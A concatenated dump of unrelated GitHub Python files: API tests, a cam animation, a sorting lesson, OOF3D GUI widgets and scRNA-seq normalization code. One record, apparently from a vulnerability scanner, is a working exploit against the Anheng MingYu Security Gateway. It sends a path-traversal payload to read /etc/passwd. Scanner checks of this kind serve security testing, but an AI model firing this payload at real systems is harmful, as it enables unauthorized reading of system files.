msg=reply.json['hits'][0][1], delta=1)\n else:\n self.assertEqual(reply.json['hits'][0][1], result['extract']['attributes'][filtersOk['target']],\n reply.json['hits'][0][1])\n\n if filtersNOk is not None:\n # TN - FN\n reply = fsmRequests.statsGroups({**defaultFilters, **filtersNOk})\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n self.assertEqual(reply.json['total'], 0, reply.json['total'])\n\n def test_count_aggregator(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'aggregator': 'count',\n 'group_by': '1d',\n\n 'handler_ids': self.events['groups']['handler_id']\n }\n )\n\n def test_max_age_aggregator(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'aggregator': 'max',\n\n 'group_by': '1d',\n 'target': 'age',\n 'handler_ids': self.events['groups']['handler_id'],\n }\n )\n\n def test_avg_age_aggregator(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'aggregator': 'avg',\n\n 'group_by': '1d',\n 'target': 'age',\n 'handler_ids': self.events['groups']['handler_id'],\n }\n )\n\n def test_min_age_aggregator(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'aggregator': 'min',\n\n 'group_by': '1d',\n 'target': 'age',\n 'handler_ids': self.events['groups']['handler_id'],\n }\n )\n\n def test_min_gender_aggregator(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'target': 'gender',\n\n 'aggregator': 'min',\n 'group_by': '1d',\n 'handler_ids': self.events['groups']['handler_id'],\n }\n )\n\n def test_group_by_edges(self):\n create_time__gt = '2017-01-01T00:00:00Z'\n for group_by_true, group_by_false, create_time__lt in (\n ('5s', '4s', '2017-01-01T01:00:00Z'),\n ('1m', '59s', '2017-01-02T00:00:00Z'),\n ('10m', '9m', '2017-02-01T00:00:00Z'),\n ('1h', '59m', '2018-01-01T00:00:00Z'),\n ('1d', '23h', '2020-01-01T00:00:00Z'),\n ):\n params = {'create_time__gt': create_time__gt, 'create_time__lt': create_time__lt,\n 'group_by': group_by_true, 'aggregator': 'count'}\n reply = fsmRequests.statsGroups(params)\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n\n params['group_by'] = group_by_false\n reply = 
fsmRequests.statsGroups(params)\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json,\n {'error_code': 12024, 'detail': \"Group step '{}' is too low\".format(group_by_false)},\n reply.json)\n\n def assertFrequencyGroupBy(self, reply, total, shift):\n self.assertEqual(reply.statusCode, 200, str(reply.statusCode) + ' ' + str(reply.json))\n self.assertEqual(reply.json['total'], total, reply.statusCode)\n self.assertEqual(reply.json['hits'], [[str(i), 1] for i in range(shift, shift + total)], reply.statusCode)\n\n def test_group_by_monthOfYear(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'monthOfYear',\n 'sources': self.name,\n 'handler_ids': self.handlers['monthOfYear'],\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 12, 1)\n\n def test_group_by_dayOfYear(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'dayOfYear',\n 'handler_ids': self.handlers['dayOfYear'],\n 'sources': self.name,\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 365, 1)\n\n def test_group_by_dayOfMonth(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'dayOfMonth',\n 'handler_ids': self.handlers['dayOfMonth'],\n 'sources': self.name,\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 31, 1)\n\n def test_group_by_dayOfWeek(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'dayOfWeek',\n 'handler_ids': self.handlers['dayOfWeek'],\n 'sources': self.name,\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 7, 1)\n\n def test_group_by_hourOfDay(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'hourOfDay',\n 'handler_ids': self.handlers['hourOfDay'],\n 'sources': self.name,\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 24, 0)\n\n def test_group_by_minuteOfDay(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'minuteOfDay',\n 'handler_ids': self.handlers['minuteOfDay'],\n 'sources': self.name,\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 1440, 0)\n\n def test_time_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'create_time__gt': self.stop,\n }\n )\n\n def test_gender_filter(self):\n gender = round(self.events['groups']['extract']['attributes']['gender'])\n\n self.assertAgregate(\n self.events['groups'],\n {\n 'gender': gender\n },\n {\n 'gender': int(not gender)\n }\n )\n\n def test_handler_filter(self):\n\n self.assertAgregate(\n self.events['groups'],\n {\n 'handler_ids': self.events['groups']['handler_id'] + ',' + str(uuid4()),\n\n 'aggregator': 'count',\n 'group_by': '1d'\n },\n {\n 'handler_ids': str(uuid4()) + ',' + str(uuid4()),\n\n 'aggregator': 'count',\n 'group_by': '1d'\n }\n )\n\n def test_age_filter(self):\n age = int(self.events['groups']['extract']['attributes']['age'])\n ages = age, age + 1\n\n self.assertAgregate(\n self.events['groups'],\n {\n 'age__gt': ages[0],\n 'age__lt': ages[1]\n },\n {\n 'age__gt': ages[1]\n }\n )\n\n def test_source_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'sources': self.name + ',' + 'test_Abudabi'\n },\n {\n 'sources': 'test_Abudabi,test_Abudabi'\n }\n )\n\n def test_similarity_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'similarity__gt': 1\n }\n )\n\n def test_sim_descriptor_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'sim_descriptor': self.sim_descriptor\n },\n {\n 'sim_descriptor': str(uuid4())\n }\n )\n\n 
def test_sim_person_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'sim_person': self.sim_person\n },\n {\n 'sim_person': str(uuid4())\n }\n )\n\n def test_sim_list_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'sim_list': self.events['groups']['search'][0]['list_id']\n },\n {\n 'sim_list': str(uuid4())\n }\n )\n\n def test_sim_user_data(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'sim_user_data': self.name\n },\n {\n 'sim_user_data': 'test_Abudabi'\n }\n )\n\n def test_tag_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'tags': self.name\n },\n {\n 'tags': self.name[:-1]\n }\n )\n\n def test_tags_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'tags': self.name + '1' + ',' + self.name\n },\n {\n 'tags': self.name[:-1] + ',' + self.name\n }\n )\n\n def test_no_group_by(self):\n reply = fsmRequests.statsGroups({'aggregator': 'count'})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12014, 'detail': \"Required parameter 'group_by' not found\"},\n reply.json)\n\n def test_no_aggregator(self):\n reply = fsmRequests.statsGroups({'group_by': '1h'})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12014, 'detail': \"Required parameter 'aggregator' not found\"},\n reply.json)\n\n def test_no_target(self):\n reply = fsmRequests.statsGroups({'group_by': '1h', 'aggregator': 'min'})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12014, 'detail': \"Required parameter 'target' not found\"},\n reply.json)\n\n def test_wrong_aggregator(self):\n aggregator = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'aggregator': aggregator})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'aggregator'\"},\n reply.json)\n\n def test_wrong_group_by(self):\n group_by = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'group_by': group_by})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'group_by'\"},\n reply.json)\n\n def test_wrong_target(self):\n target = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'target': target})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'target'\"},\n reply.json)\n\n def test_wrong_time_filter(self):\n stop = start = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'create_time__gt': start})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'create_time__gt'\"},\n reply.json)\n reply = fsmRequests.statsGroups({**neededFields, 'create_time__lt': stop})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'create_time__lt'\"},\n reply.json)\n\n def test_wrong_gender_filter(self):\n gender = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'gender': gender})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'gender'\"},\n reply.json)\n\n def 
test_wrong_handler_filter(self):\n handler_id = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'handler_ids': handler_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'handler_ids'\"},\n reply.json)\n\n def test_wrong_age_filter(self):\n age__lt = age__gt = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'age__gt': age__gt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'age__gt'\"},\n reply.json)\n reply = fsmRequests.statsGroups({**neededFields, 'age__lt': age__lt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'age__lt'\"},\n reply.json)\n\n def test_wrong_similarity__gt_filter(self):\n similarity__gt = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'similarity__gt': similarity__gt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'similarity__gt'\"},\n reply.json)\n\n def test_wrong_external_id_filter(self):\n external_id = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'external_id': external_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'external_id'\"},\n reply.json)\n\n def test_wrong_sim_descriptor_filter(self):\n sim_descriptor = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'sim_descriptor': sim_descriptor})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'sim_descriptor'\"},\n reply.json)\n\n def test_wrong_sim_person_filter(self):\n sim_person = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'sim_person': sim_person})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'sim_person'\"},\n reply.json)\n\n def test_wrong_person_id_filter(self):\n person_id = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'person_id': person_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'person_id'\"},\n reply.json)\n","repo_name":"qonteo/luna","sub_path":"fsm2_linux_rel_v.2.0.0/tests/system_tests/unittests_groups_stat.py","file_name":"unittests_groups_stat.py","file_ext":"py","file_size_in_byte":21863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35214188258","text":"while True:\r\n try:\r\n file = input(\"Enter file name: \")\r\n with open(file,\"r\") as rf:\r\n try:\r\n h = float(rf.readline())\r\n R_b = float(rf.readline())\r\n R_f = float(rf.readline())\r\n N = int(rf.readline())\r\n ranges = rf.readline().split(\", \")\r\n mo_types = rf.readline().split(\", \")\r\n except ValueError:\r\n print(\"ValueError\")\r\n break\r\n else:\r\n break # file read successfully: stop prompting for a file name\r\n except FileNotFoundError as e:\r\n print(e)\r\n\r\nfrom turtle import*\r\nimport time\r\nimport turtle\r\nfrom math import*\r\n#creating screen\r\nwn = turtle.Screen()\r\nwn.setup(600,600)\r\nwn.tracer(0)\r\nwn.title(\"Cam Profile Animation\")\r\np = turtle.Turtle()\r\nbc = turtle.Turtle() 
#follower\r\nbase = turtle.Turtle() #true base circle\r\nflw = turtle.Turtle()\r\nbc.hideturtle()\r\nbase.hideturtle()\r\np.hideturtle()\r\nflw.hideturtle()\r\ncam_list = []\r\nf_points = []\r\n\r\n\r\ntry:\r\n R_o = R_b + R_f\r\nexcept NameError as e:\r\n print(e)\r\ntry:\r\n for idx, mem in enumerate(ranges): #removing escape character '\\n' and converting str to int (enumerate avoids .index() matching an earlier duplicate)\r\n if mem[-1] == \"\\n\":\r\n ranges[idx] = int(mem[:-1])\r\n else:\r\n ranges[idx] = int(mem)\r\nexcept ValueError:\r\n print(\"ValueError\")\r\nexcept NameError as e:\r\n print(e)\r\ntry:\r\n for idx, mo in enumerate(mo_types):\r\n if mo[-1] == \"\\n\":\r\n mo_types[idx] = mo[:-1]\r\nexcept NameError as e:\r\n print(e)\r\n\r\n################################################################\r\nbound = [0] #boundary of inequalities for each angular range\r\ntry:\r\n for i in range(len(ranges)):\r\n sum = 0\r\n for num in ranges[:i+1]:\r\n sum += num\r\n bound.append(sum)\r\nexcept TypeError as e:\r\n print(e)\r\nexcept NameError as e:\r\n print(e)\r\n\r\nb_pairs = [] #boundary pairs of angular range\r\nfor i in range(len(bound)-1):\r\n b_pairs.append([bound[i],bound[i+1]])\r\ndef calc(R,R_p,x_gl): #calculating function that returns coordinates of P\r\n x_p = R_p * cos(x_gl) - sin(x_gl) * R\r\n y_p = R_p * sin(x_gl) + cos(x_gl) * R\r\n mag_N = sqrt((y_p) ** 2 + (x_p) ** 2)\r\n x_n = -(y_p) / mag_N\r\n y_n = (x_p) / mag_N\r\n x_P = R * cos(x_gl) + R_f * x_n\r\n y_P = R * sin(x_gl) + R_f * y_n\r\n return (20*x_P, 20*y_P)\r\n\r\ndef cam_f(mo,x,x_gl,B): #points of cam profile generated\r\n if mo == 'shm rise':\r\n y = (h/2)*(1-cos(pi*x/B))\r\n R = R_o + y\r\n R_p = ((h * pi) / (2 * B)) * sin((pi * x) / B)\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P,y_P)\r\n\r\n elif mo == 'shm return':\r\n y = (h/2)*(1+cos(pi*x/B))\r\n R = R_o + y\r\n R_p = -((h * pi) / (2*B)) * sin(pi * x/B)\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"cycloidal rise\":\r\n y = h*(x/B-(sin(2*pi*x/B)/(2*pi)))\r\n R = R_o + y\r\n R_p = (h/B) * (1 - cos(2*pi * x/B))\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"cycloidal return\":\r\n y = h * (1 - x/B + sin(2 * pi * x/B) / (2 * pi))\r\n R = R_o + y\r\n R_p = (h / B) * (-1 + cos((2 * pi * x) / B))\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"constant acceleration rise\":\r\n if x<=B/2:\r\n y = 2*h*(x/B)**2\r\n R = R_o + y\r\n R_p = 4*h*x/(B**2)\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif x>B/2:\r\n y = h*(1-2*(1-x/B)**2)\r\n R = R_o + y\r\n R_p = 4 * h * (1-x/B)/B\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"constant acceleration return\":\r\n if x<=B/2:\r\n y = h*(1-2*(x/B)**2)\r\n R = R_o + y\r\n R_p = -4*h*x/(B**2) #derivative of y = h*(1-2*(x/B)**2)\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif x>B/2:\r\n y = 2*h*(1-x/B)**2\r\n R = R_o + y\r\n R_p = -4 * h * (1 - x/B) / B\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"up dwell\":\r\n R = R_o + h\r\n R_p = 0\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"down dwell\":\r\n R = R_o\r\n R_p = 0\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n cam_list.append(point)\r\n\r\nM = ['shm rise',\"shm return\",\"cycloidal rise\",\"cycloidal return\",\"constant acceleration rise\",\"constant 
acceleration return\",\"up dwell\",\"down dwell\"]\r\ntry: #generating cam profile points each degree\r\n for i in range(0,361): #global angle\r\n for bp in b_pairs:\r\n if bp[0]<=i<=bp[1]: #check global angle\r\n if i == 0:\r\n seg_no = b_pairs.index(bp)\r\n if not mo_types[seg_no] in M:\r\n print(\"Error: Type of motion not recognised.\")\r\n break\r\n else:\r\n p.pu()\r\n x_gl = radians(i)\r\n x_lc = x_gl - radians(bp[0]) #finding angle x local to segment\r\n cam_f(mo_types[seg_no], x_lc, x_gl, radians(ranges[seg_no]))\r\n p.pd()\r\n else:\r\n x_gl = radians(i)\r\n x_lc = x_gl - radians(bp[0]) #finding angle x local to segment\r\n seg_no = b_pairs.index(bp)\r\n cam_f(mo_types[seg_no],x_lc,x_gl,radians(ranges[seg_no]))\r\nexcept IndexError as e:\r\n print(e)\r\n\r\ndef disp(mo,x,B): #function to generate coordinates of follower\r\n p.pencolor(\"blue\")\r\n if mo == 'shm rise':\r\n y = (h/2)*(1-cos(pi*x/B))\r\n f_coor = turtle.Vec2D(20*y+20*R_b,0)\r\n f_points.append(f_coor)\r\n elif mo == 'shm return':\r\n y = (h/2)*(1+cos(pi*x/B))\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"cycloidal rise\":\r\n y = h*(x/B-(sin(2*pi*x/B)/(2*pi)))\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"cycloidal return\":\r\n y = h * (1 - x/B + sin(2 * pi * x/B) / (2 * pi))\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"constant acceleration rise\":\r\n if x<=B/2:\r\n y = 2*h*(x/B)**2\r\n elif x>B/2:\r\n y = h*(1-2*(1-x/B)**2)\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"constant acceleration return\":\r\n if x<=B/2:\r\n y = h*(1-2*(x/B)**2)\r\n elif x>B/2:\r\n y = 2*h*(1-x/B)**2\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"up dwell\":\r\n y = h\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"down dwell\":\r\n y = 0\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n\r\ntry: #generating follower displacement each angle\r\n for i in range(0,361): #global angle\r\n for bp in b_pairs:\r\n if bp[0]<=i<=bp[1]: #check global angle\r\n x_gl = radians(i)\r\n x_lc = x_gl - radians(bp[0]) #angle local to segment\r\n seg_no = b_pairs.index(bp)\r\n disp(mo_types[seg_no],x_lc,radians(ranges[seg_no]))\r\nexcept IndexError as e:\r\n print(e)\r\n\r\nfor point in cam_list:\r\n if cam_list.index(point) ==0:\r\n p.goto(point)\r\n base.pu()\r\n flw.goto(point)\r\n flw.pd()\r\n flw.setheading(-90)\r\n flw.circle(20*R_f)\r\n base.goto(point)\r\n base.pd()\r\n base.setheading(90)\r\n base.circle(20*R_b)\r\n else:\r\n p.goto(point)\r\n wn.update()\r\n\r\nwhile True:\r\n for i in range(0,360):\r\n newlist = []\r\n for point in cam_list:\r\n newlist.append(point.rotate(-i))\r\n for new_p in newlist:\r\n p.goto(new_p)\r\n flw.clear()\r\n flw.goto(f_points[i])\r\n flw.circle(20*R_f)\r\n wn.update()\r\n time.sleep(0.001)\r\n if i != 359:\r\n p.clear()\r\n else:\r\n pass\r\n p.pu()\r\n p.home()\r\n p.pd()\r\n\r\nturtle.done()","repo_name":"DixonLYK/Cam-Profile-modelling","sub_path":"Cam profile animation 2.py","file_name":"Cam profile animation 2.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34696774890","text":"import re\n# sorting functions, regular expressions\n\n# my_list = [-2,5,-12,67,12]\n# my_list = [\"qwe\", \"QW\", \"1\", \"!@#\", \"ASDfgh\", 
\"AZXC\"]\n\n# my_list.sort(reverse=True)\n# new_list = sorted(my_list, key=len)\n\n# print(my_list)\n# print(new_list)\n#########################################################################\ndef sort_by_age(pers_dict):\n age = pers_dict[\"age\"]\n return age\n\n\ndef sort_by_name(pers_dict):\n return pers_dict[\"name\"]\n\n\ndef sort_by_name_len(pers_dict):\n name_len = len(pers_dict[\"name\"])\n return name_len\n\n\ndef sort_by_name_len_and_alphabet(pers_dict):\n name = pers_dict[\"name\"]\n return len(name), name\n\npersons = [\n {\"name\": \"John\", \"age\": 72},\n {\"name\": \"Stephany\", \"age\": 12},\n {\"name\": \"Jack\", \"age\": 42},\n {\"name\": \"Jacob\", \"age\": 37},\n {\"name\": \"Annsy\", \"age\": 29},\n]\n\nnew_persons = sorted(persons, key=lambda x: x[\"name\"])\nprint(new_persons)\nnew_persons = sorted(persons, key=sort_by_name_len)\nprint(new_persons)\n####################################################################\n# def sort_by_bday(pers_dict):\n# age = pers_dict[\"age\"]\n# ages = re.findall(r'[0-9]+', age)\n# if len(ages) > 1:\n# return int(ages[1])\n# else:\n# return 1000000\n#\n# persons = [\n# {\"name\": \"John\", \"age\": \"Years of life: 1823 - 1887\"},\n# {\"name\": \"Jack\", \"age\": \" 1878 -- 1905 \"},\n# {\"name\": \"Stephany\", \"age\": \"345 BC - 234\"},\n# ]\n#\n# new_persons = sorted(persons, key=sort_by_bday)\n# print(new_persons)\n","repo_name":"30nt/IntroPython_31_03_21","sub_path":"lesson12.py","file_name":"lesson12.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36665879102","text":"import requests\r\nimport urllib, re\r\n\r\ndef verify(url):\r\n result = {\r\n 'name': 'Anheng MingYu Security Gateway arbitrary file read (2022HVV)',\r\n 'vulnerable': False,\r\n 'attack': False,\r\n 'url': url,\r\n }\r\n timeout = 3\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) \",\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n }\r\n payload = '/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd'\r\n vurl = urllib.parse.urljoin(url, payload)\r\n try:\r\n finger_rep = requests.get(url, headers=headers, timeout=timeout, verify=False)\r\n if len(finger_rep.headers['P3P']) > 0:\r\n rep = requests.get(vurl, headers=headers, timeout=timeout, verify=False)\r\n if re.search('root:.*:0:0', rep.text) and rep.status_code == 200:\r\n result['vulnerable'] = True\r\n result['verify'] = vurl\r\n return result\r\n except:\r\n return result\r\n","repo_name":"tr0uble-mAker/POC-bomber","sub_path":"pocs/redteam/mingyu_fileread_2022.py","file_name":"mingyu_fileread_2022.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":1879,"dataset":"github-code","pt":"37"} +{"seq_id":"2139890503","text":"from ooflib.SWIG.common import switchboard\nfrom ooflib.common import debug\nfrom ooflib.common.IO.GUI import chooser\nfrom ooflib.common.IO.GUI import parameterwidgets\nfrom ooflib.engine import namedanalysis\n\nclass AllAnalyses(object):\n def getNames(self):\n return (namedanalysis.analysisNames())\n def signals(self):\n return [\n switchboard.requestCallbackMain(\"named analyses changed\",\n self.update)\n ]\n\nclass AnalysisNamesWidgetBase(parameterwidgets.ParameterWidget):\n def __init__(self, param, scope=None, name=None, verbose=False):\n names = self.getNames()\n names.sort()\n self.widget = chooser.ScrolledMultiListWidget(names,\n 
callback=self.widgetCB)\n parameterwidgets.ParameterWidget.__init__(self, self.widget.gtk,\n scope, name=name,\n expandable=True,\n verbose=verbose)\n self.widget.set_selection(param.value)\n self.widgetChanged(param.value is not None, interactive=False)\n self.sbcallbacks = self.signals()\n self.widgetChanged(len(self.get_value()) > 0, interactive=False)\n def cleanUp(self):\n map(switchboard.removeCallback, self.sbcallbacks)\n parameterwidgets.ParameterWidget.cleanUp(self)\n def get_value(self):\n return self.widget.get_value()\n def set_value(self, value):\n self.widget.set_selection(value)\n def widgetCB(self, list, interactive):\n self.widgetChanged(len(list) > 0, interactive=True)\n def update(self, *args):\n names = self.getNames()\n names.sort()\n self.widget.update(names)\n self.widgetChanged(len(self.get_value()) > 0, interactive=False)\n\n\nclass AnalysisNamesWidget(AnalysisNamesWidgetBase, AllAnalyses):\n pass\n\ndef _AnalysisNamesParam_makeWidget(self, scope=None, verbose=False):\n return AnalysisNamesWidget(self, scope, name=self.name, verbose=verbose)\n\nnamedanalysis.AnalysisNamesParameter.makeWidget = _AnalysisNamesParam_makeWidget\n\n################\n\nclass AnalysisNameWidgetBase(parameterwidgets.ParameterWidget):\n def __init__(self, param, scope=None, name=None, verbose=False):\n self.chooser = chooser.ChooserWidget([], name=name)\n parameterwidgets.ParameterWidget.__init__(self, self.chooser.gtk, scope, verbose=verbose)\n self.update()\n if param.value is not None:\n self.set_value(param.value)\n self.sbcallbacks = [\n switchboard.requestCallbackMain(\"named analyses changed\",\n self.update)\n ]\n def cleanUp(self):\n map(switchboard.removeCallback, self.sbcallbacks)\n parameterwidgets.ParameterWidget.cleanUp(self)\n def set_value(self, name):\n self.chooser.set_state(name)\n self.widgetChanged(name is not None, interactive=False)\n def get_value(self):\n return self.chooser.get_value()\n def update(self, *args):\n names = self.getNames()\n names.sort()\n self.chooser.update(names)\n self.widgetChanged(len(names) > 0, interactive=False)\n\n\nclass AnalysisNameWidget(AnalysisNameWidgetBase, AllAnalyses):\n pass\n\ndef _AnalysisNameParam_makeWidget(self, scope=None, verbose=False):\n return AnalysisNameWidget(self, scope, name=self.name, verbose=verbose)\n\nnamedanalysis.AnalysisNameParameter.makeWidget = _AnalysisNameParam_makeWidget\n","repo_name":"usnistgov/OOF3D","sub_path":"SRC/engine/IO/GUI/namedanalysiswidgets.py","file_name":"namedanalysiswidgets.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"8763953728","text":"import time\nfrom math import log, ceil\n\nimport numpy as np\nfrom scipy.sparse import csr_matrix\nimport scanpy as sc\nfrom sklearn.metrics.pairwise import pairwise_distances\nfrom sklearn.decomposition import PCA\n\n\ndef _median_normalize(X):\n \"\"\"Performs median-normalization.\n \n Parameters\n ----------\n X : numpy.ndarray\n A n-by-p expression matrix containing UMI counts for n cells and p\n genes.\n \n Returns\n -------\n numpy.ndarray\n A n-by-p expression matrix containing the normalized UMI counts.\n \n Notes\n -----\n We first determine the median total UMI count per cell, and then scale\n each expression profile so that its total UMI count equals that number.\n This normalization method was originally described as \"Model I\" in\n Grün et al., Nature Methods (2014).\n \"\"\"\n num_transcripts = np.sum(X, axis=1)\n X_norm = 
(np.median(num_transcripts) / num_transcripts).reshape(-1,1) * X\n return X_norm\n\n\ndef _freeman_tukey_transform(X):\n \"\"\"Applies the Freeman-Tukey transformation, y = sqrt(x) + sqrt(x+1).\n \n Parameters\n ----------\n X : numpy.ndarray\n A n-by-p expression matrix containing UMI counts for n cells \n and p genes (usually after median-normalization).\n \n Returns\n -------\n numpy.ndarray\n A n-by-p expression matrix containing the Freeman-Tukey-transformed\n UMI counts.\n \n Notes\n -----\n The Freeman-Tukey transformation serves to stabilize the variance of\n Poisson-distributed random variables. For X ~ Pois(l) with l >= 1, Freeman\n and Tukey (1953) show that Var(X) = 1 (+- 6%).\n \"\"\"\n return np.sqrt(X) + np.sqrt(X+1)\n\n\ndef _calculate_pc_scores(matrix, d, seed=0, verbose=False):\n \"\"\"Projects the cells onto their first d principal components.\n \n Parameters\n -----\n matrix: `numpy.ndarray`\n A n-by-p expression matrix containing the UMI counts for n cells\n and p genes.\n \n Returns\n -------\n `numpy.ndarray`\n A n-by-d matrix containing the coordinates of n cells in d-dimensional\n principal component space.\n\n Notes\n -----\n We perform median-normalization and Freeman-Tukey-transformation to the UMI\n counts, before performing PCA. Median-normalization serves to counteract\n efficiency noise (Grün et al., 2014), whereas Freeman-Tukey transformation\n stabilizes the technical variance of the data. While PCA does not require\n homoskedastic data, variance-stabilization ensures that the increased\n technical variance of highly expressed genes does not result in the first\n PCs being biased towards highly expressed genes.\n We specify svd_solver='arpack', which uses ARPACK to efficiently calculate\n only the first d principal components. (We assume that d << min(p, n-1).)\n 